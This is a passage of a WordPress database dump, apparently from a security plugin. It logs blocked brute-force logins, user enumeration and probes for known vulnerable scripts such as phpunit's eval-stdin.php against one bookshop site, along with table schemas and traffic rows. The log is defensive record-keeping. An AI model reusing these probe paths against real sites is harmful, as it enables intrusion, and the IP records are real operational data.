),('144.126.134.44',2424210988,'admin',0,1638448746.4809,7,'2npmw8EYL3zvfHoR0PgeIW1S','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('182.254.234.148',3070159508,'admin',0,1638449389.0271,7,'moWI2UYpSzf6P8sOinC5g43r','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('150.95.112.79',2522837071,'admin',0,1638450679.4163,7,'FUEjtoAM0d2lpnDHxg8Sr6ks','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.70.11.21',3108375317,'admin',0,1638451339.0672,7,'TyL4FMfEhxzRIsY79joP3ZqD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('110.173.132.17',1856865297,'admin',0,1638452635.9500,7,'zoINnkR1txWT0S2vJ3aipK9D','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.227.78.130',1088638594,'admin',0,1638453241.3938,7,'sCApTjFhivG8dDRSwgaY7nyH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('142.93.253.189',2388524477,'admin',0,1638453971.8732,7,'pdlrD5vu1akW4jKHfEnBSNcP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.202.172.247',1389014263,'admin',0,1638454740.1112,7,'C0pitA4Ro81bdkJvQ7YTzGVP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1638455327.7936,55,'rkQ32O5PcAMt0U4esVESzDK7','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/whatsmyrank-devenc/php-ofc-library/ofc_upload_image.php'),('35.241.123.16',603028240,'admin',0,1638455444.7902,7,'37FAUmVhbTukMZgtfwnjsL9B','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'ashbooks',0,1638455697.5843,51,'RnlwipHr1KETgkMZtvzmbNj8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('145.239.30.120',2448367224,'admin',0,1638456136.1802,7,'oQ3h9zVgy1nuq2LdG0DUepOC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.109.54.127',3496818303,'admin',0,1638457517.7148,7,'KgbHAI0jfTOm5Z3EnzaMYx4q','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.126.219.43',3112098603,'admin',0,1638458178.4832,7,'Cl9sgPZrStQYzoOMEUpLjqvN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('42.193.21.177',717297073,'admin',0,1638458838.1606,7,'6oJypTUEglfsOh7xebFPY8Kd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.131.90',1920435034,'',0,1638459106.0853,55,'CMeN37tWloH9wrqYfcxZXmKz','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('81.88.52.26',1364735002,'admin',0,1638459473.4310,7,'K8zjLyUrbQpPR2YmHONwWIM1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.246.160',2916415136,'admin',0,1638460118.1482,7,'4LJAZlREQYWNCsokwcqptzKS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.31.0.242',2954821874,'admin',0,1638460764.8905,7,'4kX9izJCNarpyI856u1FQDl7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.68.248.47',2319775791,'admin',0,1638461426.1529,7,'GVfL2UAQEtpBkv94MKaRcDHI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.232.79',1168369743,'admin',0,1638462078.4709,7,'MOltKaUoszHuZEhIjWvgLBN8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.15.239',2703429615,'admin',0,1638462726.1062,7,'u8POodj3Ss7bg5eZJyV1hGvw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.56.218',3165010138,'admin',0,1638463371.6788,7,'BbZWAmN3lRgM4c2sPiJqK9Xk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.87.200.193',1834469569,'admin',0,1638464016.6795,7,'ICEFyBntUDAZb0x5aGmrq1L2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.74.197.132',1833616772,'admin',0,1638464664.3946,7,'LhJXTsuiqCe2ZRO1dQIpnUYk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.195.42.19',868428307,'admin',0,1638465316.3938,7,'iEYRU36f9sOP27kVtpLNdHnv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.172.219.253',1806490621,'admin',0,1638465966.9916,7,'2Vu10pRlMB58HsbeNQJPADnq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('145.239.30.120',2448367224,'admin',0,1638466614.4129,7,'M4aRY5ceGqdXwCusWFBHnAbE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.113.111.54',1567715126,'admin',0,1638467264.5429,7,'paxdN2uRS89z10i4TD5w3qCK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.225.70.87',1088505431,'admin',0,1638467915.2898,7,'f6zLVveZ13OY2WKprbjBtnsX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.142',757638798,'admin',0,1638469217.0346,7,'wDO78BfpLqPuJ1gtFXQ6jamY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('65.108.51.66',1097610050,'admin',0,1638469876.0071,7,'aVHu3ICfBGPWtEyv6m4bgRF7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.44',3103917100,'admin',0,1638470530.1493,7,'ZmNpzP0VTCJYDKasy71vlrQn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.168.97.89',1839751513,'admin',0,1638471184.5742,7,'lxgSv8tL2G7OQbe3Hmq60W5s','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.236.145.137',2917962121,'admin',0,1638471841.6277,7,'FTcMAHaYl5O1n3mIWx4uzCwe','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('200.170.156.249',3366624505,'admin',0,1638472500.5549,7,'PcGF1qMLma2jJUDZCBRltA9T','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.101.100.156',778396828,'',0,1638472663.6158,70,'2RueLCfSrbaz4Vn8lci7pwU0','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('46.101.100.156',778396828,'',0,1638472663.6216,70,'cWBdeY2s1J6wFQfbG7XlIZiE','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('103.121.89.72',1736005960,'admin',0,1638473160.7667,7,'h6dT7BqISV9swaRijmf8lEOP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.56.218',3165010138,'admin',0,1638474496.2256,7,'OHF32r9TSXgQD4PmKZvWcwIY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.68.69.48',2319729968,'admin',0,1638475169.4851,7,'7F8nqKdWTlv3EuhcYbBMIeZt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.208.189.233',1389411817,'',0,1638475561.7802,55,'tdvM32mK8Fk0iJlgjD5N1GTL','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('82.156.109.203',1385983435,'admin',0,1638477211.3415,7,'1QwiGdgfjynbeZo4JXrcm0za','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.195.206',1608106958,'admin',0,1638477886.3120,7,'GJXEW35Vt0wxORL2Ph7k9sdb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.207.179.129',1087353729,'admin',0,1638478564.7110,7,'kBXWbmiQDxMlScROGoVstUue','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.12.32.57',755769401,'admin',0,1638479248.9295,7,'7gEbQ53ftXSlzyZusFJo20xP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.217.209',2650134993,'admin',0,1638479940.3337,7,'HeuJ2AxVnK05cQo8143atglE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.15.239',2703429615,'admin',0,1638481298.4190,7,'ATgi7KGPFlWnshum9NxIj28C','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('134.209.196.64',2261894208,'admin',0,1638482669.6147,7,'C7vQIRYwdapqm5yo2SDfMGOJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('42.193.21.177',717297073,'admin',0,1638483353.8805,7,'APkiUFeB4vx8lYEZSuj6znLr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.185.130.172',3233383084,'admin',0,1638484040.8306,7,'pMrVFEuPOYTlyJgmQHa7wkvf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.94.163.77',2606670669,'admin',0,1638484725.7445,7,'tqPL4eJBOCjDFvXMoYZlaHgc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.94.198',3165019846,'admin',0,1638485408.3867,7,'mlNxAXYdoKq9whkvftnirzCQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('68.183.108.18',1152871442,'admin',0,1638486794.5815,7,'qJA2kVOcNyKXruLC09afREd3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.31.0.242',2954821874,'admin',0,1638487488.8033,7,'DCFKWxmsSEtJypIiZUh40fNR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.26',1364735002,'admin',0,1638488178.0734,7,'cFQT4NVDE5AKjYfzGCXm8BU1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.87.200.193',1834469569,'admin',0,1638488866.9019,7,'NQpRV70OlfxZiEA8dXHPGY52','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.121.89.72',1736005960,'admin',0,1638489564.7930,7,'k9BTq4cibo5fKjxFhn10ErOv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.212.34.69',3168019013,'admin',0,1638490264.3411,7,'6zF0AphQWJos9SvHTRDKPrwa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('164.68.101.188',2755945916,'admin',0,1638490967.5310,7,'C7SoNWrMHuI5KthAe9fBaJv2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.194.13',2994782733,'admin',0,1638491665.7249,7,'vjAgK7UyOd8q4CtuXZx25BNp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.50.199.194',3107112898,'admin',0,1638492366.4763,7,'dJroQHg9wLEYsSIUxmvaV7Kp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.35',1805007139,'admin',0,1638492468.0742,7,'20KF3Zt5qiR1wASPTNCYWLMh','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.2.4.71',3103917127,'admin',0,1638492852.7205,7,'qU36ISOBLsn24WAG9aDklcw8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.76.102.246',2420926198,'admin',0,1638493550.4312,7,'c4a936THud70LqbSJRDNie1g','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.77.223.41',860741417,'admin',0,1638494251.3899,7,'1OuoK78Ep9RqJaAvY52lWtrg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.128.43.176',1602235312,'admin',0,1638494954.2045,7,'vhSeiAPjmRWDlNFqXG9VtI0n','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.91.68.146',2421900434,'admin',0,1638495657.9933,7,'wzOfWRyxQEUcmbdn7FD31620','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.194.13',2994782733,'admin',0,1638496357.4807,7,'dNEuUtbfnzvc7HFWsDlT9Rk4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1638496502.0948,55,'xlJHYIzBUjr3Qhp5c4DPTO9W','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php'),('176.9.91.103',2953403239,'admin',0,1638497065.4339,7,'ApbYRq7rOfoC65e1yvGX8DEV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('134.209.231.225',2261903329,'admin',0,1638497787.3088,7,'lu9dCENJfDZWvSzMAgOnaoUT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.92.58.160',576469664,'admin',0,1638498493.3587,7,'1LMu8fKFASeNyHXJ2awBDWkv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('204.12.198.242',3423389426,'admin',0,1638498768.8970,7,'DPKnNQhcBGL1l5wSuj9WXiH7','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('178.32.89.175',2988464559,'admin',0,1638499206.6693,7,'lwUCMNc3AvQ6SaH7P0puXdz4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('156.38.216.210',2619791570,'admin',0,1638501319.5789,7,'7B4yw1FOHlzfvhLeDgUVJrEb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('187.51.127.28',3140714268,'admin',0,1638502003.5396,7,'Zrk8RgvSDQIjJGE5hbaXHi3M','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.40.71.188',3156756412,'admin',0,1638502668.8747,7,'nHthpdXCoNTZw8smceUPO3ua','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.212.180',2916406452,'admin',0,1638503324.1310,7,'5hW4BZ1dLNeugHoykJUqzTc7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.71.89.92',2806471004,'admin',0,1638503984.6150,7,'6UJNAxvgWEeP5VRtMqc8rB40','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.26',1364735002,'admin',0,1638504645.6636,7,'wzpHOjbrMUQi3dqLvNyB7FJT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.142.26.247',1737366263,'admin',0,1638505315.3012,7,'ZPidsGWp7V4haq3ztxv1uBcH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.101.26.42',778377770,'admin',0,1638505973.5239,7,'9t4f8KAVESxW5M1UviCQeu3N','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.114.144.212',1735561428,'admin',0,1638506636.2536,7,'BMWv29bkYDN130cUEwl7aifd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.208.189.233',1389411817,'',0,1638506900.9190,55,'VK9S2vRk3ZHhGyEUwl4gftec','','19|0|0|0|ashbooks.co.uk/1index.php'),('35.189.40.244',599599348,'admin',0,1638507310.6854,7,'l3NPTyGKCQgswHd6MvbuEafn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.52.97.144',3325321616,'admin',0,1638507992.5724,7,'r3pfo5wmZ6hTROiMgI4xyjNG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('54.38.181.202',908506570,'admin',0,1638508663.9683,7,'zuovrS24yBZCwP9peG5FR3WO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('206.189.111.216',3468521432,'admin',0,1638509343.7920,7,'PKFToODjrwI21Ev4LCRxNpGB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.38.99.188',1495688124,'',0,1638509478.0978,55,'OoJDsQ0Gdfa9EbhyvAcXt51w','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('34.75.201.58',575392058,'admin',0,1638510022.1221,7,'qx510vzpPy4ZhjTJO9sDUHEA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('195.176.3.23',3283092247,'admin',0,1638510344.7973,7,'u01rfFInahm7NDsjxbVMA9KG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('193.19.240.121',3239309433,'admin',0,1638510707.8146,7,'xDnPILTijwZvltEUmzk9gOGK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.81.89.248',55663096,'',0,1638511877.7020,55,'9D5nfdFa1WBUQ3oGCbZXqJuH','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('192.187.127.21',3233513237,'admin',0,1638511984.6373,7,'TRlrthAVLe2Db9W0UIC6wvpP','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('143.244.184.195',2415179971,'admin',0,1638512093.8071,7,'6SOLWBRzwaGfTXyn1odqKCYu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.45.171.143',3190664079,'admin',0,1638512780.3053,7,'TeZD3syfFpG95Ih0Er4Oz8A7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.9.91.103',2953403239,'admin',0,1638513467.9541,7,'0XJbKzUopker2sihGB5ETdqA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.255.112.220',2919198940,'admin',0,1638514852.7807,7,'XHA9TvsekOYN2fdCP5RMFqrn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.192.52',2916401204,'admin',0,1638515547.4295,7,'z1ESda48CUV5oXibFW2Psre6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.31.0.242',2954821874,'admin',0,1638516240.8486,7,'EX8vU2P3CSmxD7HbdzTZw6FR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.163.152.242',3265501426,'admin',0,1638516939.7748,7,'Ng9ZWczLl3RTuSpb2QsyItj8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.38.209.176',1495716272,'admin',0,1638517630.4895,7,'pqRYWX8BmFgajEuKtvzlsH6e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.69.81',2813085009,'admin',0,1638518324.0386,7,'5hvXljyf4m72JzKC0HVr3eLT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.214.190.209',2731982545,'admin',0,1638519018.2607,7,'gmIEBoAepv54WGP9U3ZJTVnj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('106.52.171.211',1781836755,'admin',0,1638519717.1780,7,'NXKosknevqYb4dlJVHpAi6jt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.15.160.22',856662038,'admin',0,1638520414.5019,7,'znTLjtZ02wcHQpRPs4Mv96eB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.96.90.125',1499486845,'admin',0,1638521103.5126,7,'PfmwsACWiTbr1MldI9RQaoGH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.45.207.95',86888287,'',0,1638521227.1890,55,'9moWjnvX0IetY8T3HLP1wb4s','','19|0|0|0|ashbooks.co.uk/weblog/index.php'),('177.55.111.11',2973200139,'admin',0,1638521800.5120,7,'2J8oh9QPTzYxn0OpfvjDdILA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.120.136.106',762873962,'admin',0,1638522499.2664,7,'vfSV5H6cX0IRUdLTbjpCoxAD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.163.152.242',3265501426,'admin',0,1638523197.2452,7,'tEB4VTY89wLr7uzgeOdpRflo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('133.18.226.126',2232607358,'admin',0,1638523894.2184,7,'PrjTFlUkDEcI72qzxweOHgKn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.2.138.16',3187837456,'',0,1638524318.8285,55,'fuoqj3SZDkRIJlhVdFnmvxY0','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('88.150.159.29',1486266141,'admin',0,1638524585.2385,7,'mwhfgRiG9kH3TunDztosFpjQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.156',1159653276,'admin',0,1638525474.6471,7,'GSvLQhqnuKi8BVO6pUdoTs4R','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('188.166.1.143',3164995983,'admin',0,1638526682.3235,7,'XeFWvAQO9h1KyGdbnlTDRofJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.114',1364735090,'admin',0,1638527382.1131,7,'cGVgle89fLtszI6AOrvYxo75','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.86.118.101',2807461477,'admin',0,1638528083.7293,7,'kKhtwP0FEiAbgWUjBJln1s8e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.59.118.238',2335930094,'admin',0,1638528792.5029,7,'EXtL0Vfw1jgRFTSIlmszND7y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.192.241.93',3569414493,'',0,1638529253.8602,55,'3hPXLOaMoc8BNp4EWGwVtRQr','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('212.192.241.93',3569414493,'',0,1638529254.3861,55,'vrnRd51DV4iEHsYTUa8Gp6Jz','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('212.192.241.93',3569414493,'',0,1638529254.6618,55,'sToyuc25LBreIYpfDnWVzgPM','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('107.172.219.253',1806490621,'admin',0,1638529497.6727,7,'8EhrQAd5zVuyfUnopY2MOwtR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.197.183.99',2328213347,'admin',0,1638530207.4016,7,'qGON1jBXSysFeP3L6RxZMiwA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.1.143',3164995983,'admin',0,1638530911.0768,7,'VMA3iBxkwtzJoP2yn4WpgdhO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('200.170.156.249',3366624505,'admin',0,1638531613.6579,7,'grsA3cCFufX6ZKGaMTpVUHSJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('37.139.13.163',629869987,'admin',0,1638532315.3160,7,'bzcfj8DTakwPq7Otn9LHWM53','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.126.219.43',3112098603,'admin',0,1638533018.9556,7,'vamXpPCHtTFRzngKYr8s3DVo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.72.140.173',575179949,'admin',0,1638533732.8783,7,'HZdi45kW08gsympjEc21CJ97','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.121.89.72',1736005960,'admin',0,1638534445.8868,7,'y8fr2iRYmQ1GbIS9qgNUE603','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.143',757638799,'admin',0,1638536591.4821,7,'UVqTw3PeYo0GRAaflicyknCx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('116.255.160.108',1962909804,'admin',0,1638538028.9079,7,'Q0Wuz4jHnY7K1A2V3CokZv6P','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.202',3233511114,'admin',0,1638538036.3937,7,'hl1unEKLvgWD7cUizwPfQpeH','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('5.255.253.175',100662703,'',0,1638538519.0439,55,'AC7z68drVmLNhnTQRHIlJgS2','','19|0|0|0|ashbooks.co.uk/weblog/index.php'),('23.228.109.147',400846227,'',0,1638538899.4839,55,'SAgfVB8TXOjrk93QzNcILGR2','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wpwhatsmyrankvideoregular-unlimited/php-ofc-library/ofc_upload_image.php'),('109.87.200.193',1834469569,'admin',0,1638539460.5375,7,'XI6oYhCR3S2rkzcAxde7J1ME','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('152.228.140.7',2565114887,'admin',0,1638540178.1485,7,'oLmaHFlbXJ8Mu3yWVQvKrGei','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('37.139.13.163',629869987,'admin',0,1638540897.4560,7,'ilrMmBfea8AxsoS27XIbTcE9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.219.236.228',1541139684,'ashbooks',0,1638541067.2909,51,'BUXj6n9YPsfqErWAlCzmxFe5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.71.199.161',2806499233,'admin',0,1638541622.3496,7,'82eyACu0oK3HJZ5bdnszf7T9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('88.150.159.29',1486266141,'admin',0,1638589742.8663,7,'QNnCvxdFfcYIHZogKUbGWh6r','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.106',1364735082,'admin',0,1638608604.2976,7,'zv5nHBRswV9UdEWkKr1j8iqJ','','0|0|0|0|ashbooks.co.uk/wp-login.php');
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
INSERT INTO `cerber_traffic` VALUES ('20.69.165.194',340108738,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','LmuPaQIc3e01tfpWXMbdlYyT',0,1635949927.2399,468,'','GET',403,0,520,0,1,'',0),('45.90.219.64',760929088,'','https://ashbooks.co.uk/old-index.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','TikzBIlq9nFZSV26dvD3ArbO',0,1635953874.6655,491,'','GET',403,0,700,0,1,'',0),('93.113.111.100',1567715172,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','AFZhoGgEHOJb2iwUnl6CreSN',0,1635959246.7910,141,'','GET',403,0,520,0,1,'',0),('93.113.111.100',1567715172,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','Eg9JWZwTDf1MCU5qF4NV82ev',0,1635959246.8883,151,'','GET',403,0,520,0,1,'',0),('171.217.251.23',2883189527,'','https://www.ashbooks.co.uk/l.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.ashbooks.co.uk\\/l.php\"}','ChgNjAI9YboOc8rdKuxwViUD',0,1635964113.4087,631,'','GET',403,0,700,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-admin/network/user-about.php?login=binht','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','Kc3EaWqv4ygN8oPH9iZY5UsQ',0,1635966575.8773,405,'','GET',403,0,700,0,1,'',0),('69.30.217.110',1159649646,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','knjlpRJtHmoyOGr68QhqiBXx',0,1635968836.0039,427,'','POST',403,0,600,0,1,'',0),('192.187.118.203',3233511115,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 